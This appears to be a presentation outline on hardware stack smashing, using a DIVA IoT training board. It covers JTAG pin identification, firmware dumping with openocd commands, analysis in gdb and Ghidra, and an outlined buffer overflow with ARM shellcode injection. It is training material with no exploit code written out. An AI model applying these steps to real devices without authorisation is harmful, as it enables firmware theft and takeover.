# Stack Smashing on Hardware (From basics to implementation) --- ## Outline * Basic concept * Extracting firmware using JTAG, openocd, telnet * Firmware Reverse engineering basics using gdb and ghidra * Stack exploitation implementation --- ## Basic Concept * Stack * Stack Pointer * Buffer Overflow --- ## Debugging Ports * JTAG * SWD --- ## JTAG PORT Identification ( Demo using DIVA IoT Board ) --- * Using microcontroller datasheet & digital multimeter conductivity test * Google search controller datasheet (http://www.st.com/resource/en/datasheet/stm32f411re.pdf) ---  --- * Multimeter (DMM) setup  ---  --- * The pins identified (J3 Pin Header): * Pin 1 - TCK (49) * Pin 3 - TMS (46) * Pin 5 - TDI (50) * Pin 7 - TDO (55) * Pin 9 - TRST (56) * Pin 8, 10 - Gnd * Other methods - JtagEnum or JTAGULATOR --- * FT2232 based Expliot-nano as JTAG adapter  --- * openocd to interface with the JTAG port * openocd -f /path/to/ftdiAdapter.cfg -f /path/to/target/stm32f4x.cfg * telnet to communicate to openocd * telnet localhost 4444 --- * Identify flash memory address and the total length  --- ** Flash memory : 0x08000000 - 0x0807ffff ** * Firmware Dump * reset halt * dump_image filename.bin 0x08000000 0x7ffff --- * Affect - * strings (Hardcoded passwords) * modify and reflash the code * ..........many more --- * Bin file (Raw) analysis using Ghidra * Opened GDB on terminal: * gdb-multiarch * set arch arm * target remote localhost:3333 --- * Identify the offset of buffer - the vulnerable point * ARM shellcode to write particular register * Smash the stack and inject own shellcode using python script * Yep, divert the original firmware logic and get your code executed --- ## Reference * http://www-inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf --- ## Thank You